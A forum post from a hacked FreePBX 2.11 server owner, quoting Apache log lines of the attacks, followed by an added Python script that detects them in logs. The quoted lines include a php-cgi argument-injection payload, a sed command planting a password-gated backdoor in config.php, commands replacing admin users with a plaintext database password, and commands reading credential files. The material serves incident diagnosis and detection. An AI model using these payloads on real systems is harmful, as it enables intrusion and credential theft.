Hi,
I have recently opened a recent FreePBX install to the outside world and it was hacked nearly immediately. Is anyone aware of its vulnerability? What was definitely hacked:
1) the admin FreePBX panel password has been changed;
2) access to all configs, including SIP accounts, has been gained;
3) the MySQL password of the freepbx user was also gained;
4) the ability to execute shell commands; several strange queries have been found in the Apache logs:
a)
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
which decodes to
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
What does this do?
b)
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=sed%20-i%20's/.<?php./<?php\nif\($_GET["function"]=="system"\)%20exit\(\);\nif\(md5\($_REQUEST["p"]\)=="c82e1edd948c8b34457e3e5fa17d1732"\)%20@system\($_REQUEST["mgk"]\);/'%20config.php HTTP/1.1" 200 458 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
c)
79.143.80.226 - - [12/Mar/2014:00:44:06 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=shell_exec&args=ls HTTP/1.1" 200 622 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
d)
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20--execute%20"truncate%20ampusers";%20mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20--execute%20"INSERT%20INTO%20ampusers%20(username,%20password_sha1,%20sections)%20VALUES%20(%27sona%27,%20%2719ad8cfe45a840a69d4dfcbb02ef9db41bb2ceb0%27,%20%27*%27)" HTTP/1.1" 200 458 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20-e%20"-Amportal.conf%20Passwords:\n";%20grep%20PASS%20/etc/amportal.conf;%20echo%20-e%20"\n-sip_additional.conf:\n";%20cat%20/etc/asterisk/sip_additional.conf|grep%20-v%20';' HTTP/1.1" 200 1075 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
So what I am worried about:
1) have they left some code which can repeat the hack again from the inside?
2) is there a chance they have gotten the root system password?
3) Is this a known problem?
4) Is it going to be fixed?
5) How safe is it to open FreePBX outside the local network?
FreePBX 2.11.0
Thanks.
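Added example, not part of the post above and not FreePBX code: a small Python log triage script that parses Apache combined-format lines like the ones quoted, percent-decodes the request, and flags the two patterns the post shows. The first is a request to a php-cgi binary whose query string contains no literal "=" and decodes to php-cgi options (the POST /cgi-bin/php?... line; this is the public php-cgi argument-injection bug CVE-2012-1823, and the decoded options make PHP execute the request body as code via auto_prepend_file=php://input with allow_url_include=on, with -n ignoring php.ini). The second is a FreePBX /admin/config.php call with handler=api and a shell function in function=, whose args= payload is decoded so you can read what was run; commands that rewrite a .php file (the sed -i line that plants a backdoor in config.php) are tagged as persistence, which speaks to question 1. The sample lines are constructed from the post's requests: the POST line's client address, status, size and user agent are made up because the post only shows the request, and the curl user-agent strings are shortened.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format; only the fields the detectors need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths that map to a php-cgi binary, e.g. /cgi-bin/php, /cgi-bin/php5, /cgi-bin/php-cgi
PHP_CGI_PATH = re.compile(r"/php(-cgi)?[0-9.]*$")

# PHP functions that hand a string to a shell; the post shows system and shell_exec.
SHELL_FUNCS = {"system", "shell_exec", "exec", "passthru", "popen", "proc_open"}

# Arguments that edit or create a .php file: persistence, not just a one-off command.
WRITES_PHP = re.compile(r"sed\s+-i\b.*\.php\b|>>?\s*\S*\.php\b")

# Query string copied from the post's POST /cgi-bin/php?... request.
ENCODED_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63"
    "%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65"
    "%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72"
    "%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"
)

# Constructed sample log: the POST line's client, status, size and agent are made up;
# the two GET lines are the post's own requests with the user agent shortened; the last
# line is an ordinary admin page load that must not be flagged.
SAMPLE_LINES = [
    '203.0.113.7 - - [11/Mar/2014:00:40:02 +0200] "POST /cgi-bin/php?'
    + ENCODED_QUERY + ' HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    r'''46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=sed%20-i%20's/.<?php./<?php\nif\($_GET["function"]=="system"\)%20exit\(\);\nif\(md5\($_REQUEST["p"]\)=="c82e1edd948c8b34457e3e5fa17d1732"\)%20@system\($_REQUEST["mgk"]\);/'%20config.php HTTP/1.1" 200 458 "-" "curl/7.15.5"''',
    r'''79.143.80.226 - - [12/Mar/2014:00:44:06 +0200] "GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=shell_exec&args=ls HTTP/1.1" 200 622 "-" "curl/7.15.5"''',
    '203.0.113.9 - - [12/Mar/2014:09:15:00 +0200] "GET /freepbx/admin/config.php?display=extensions HTTP/1.1" 200 14022 "-" "Mozilla/5.0"',
]


def parse_query(query):
    """Decode a query string into {name: value} the way PHP fills $_GET (first value wins)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def detect_php_cgi_argument_injection(target):
    """Return the decoded php-cgi argv if `target` abuses query-string-as-argv, else None.

    php-cgi only treats the query string as command-line options when it contains no
    literal '=' character, which is why the attacker percent-encodes every byte: the
    '=' signs only appear after decoding.
    """
    path, _, query = target.partition("?")
    if not query or not PHP_CGI_PATH.search(path) or "=" in query:
        return None
    decoded = unquote_plus(query)
    return decoded if decoded.lstrip().startswith("-") else None


def detect_freepbx_api_exec(target):
    """Return (function, decoded args) for config.php?handler=api&function=<shell fn>, else None."""
    path, _, query = target.partition("?")
    if not path.endswith("/admin/config.php"):
        return None
    params = parse_query(query)
    func = params.get("function", "")
    if params.get("handler") != "api" or func not in SHELL_FUNCS:
        return None
    return func, params.get("args", "")


def analyze(lines):
    """Run both detectors over Apache combined-log lines; returns a list of finding dicts."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        argv = detect_php_cgi_argument_injection(target)
        if argv is not None:
            findings.append({"ip": ip, "kind": "php-cgi-argv-injection", "detail": argv})
        hit = detect_freepbx_api_exec(target)
        if hit is not None:
            func, args = hit
            kind = "freepbx-api-rce"
            if WRITES_PHP.search(args):
                kind += "+persistence"  # the command edits a .php file: a left-behind backdoor
            findings.append({"ip": ip, "kind": kind, "detail": f"{func}({args})"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f"{f['ip']:16} {f['kind']:32} {f['detail'][:80]}")
```

Run it against a real access_log with analyze(open("/var/log/httpd/access_log")) and pivot on every IP that produced a finding; the php-cgi detector deliberately keys on the absence of a literal "=" in the raw query rather than on the option names, so variants with different -d settings are still caught.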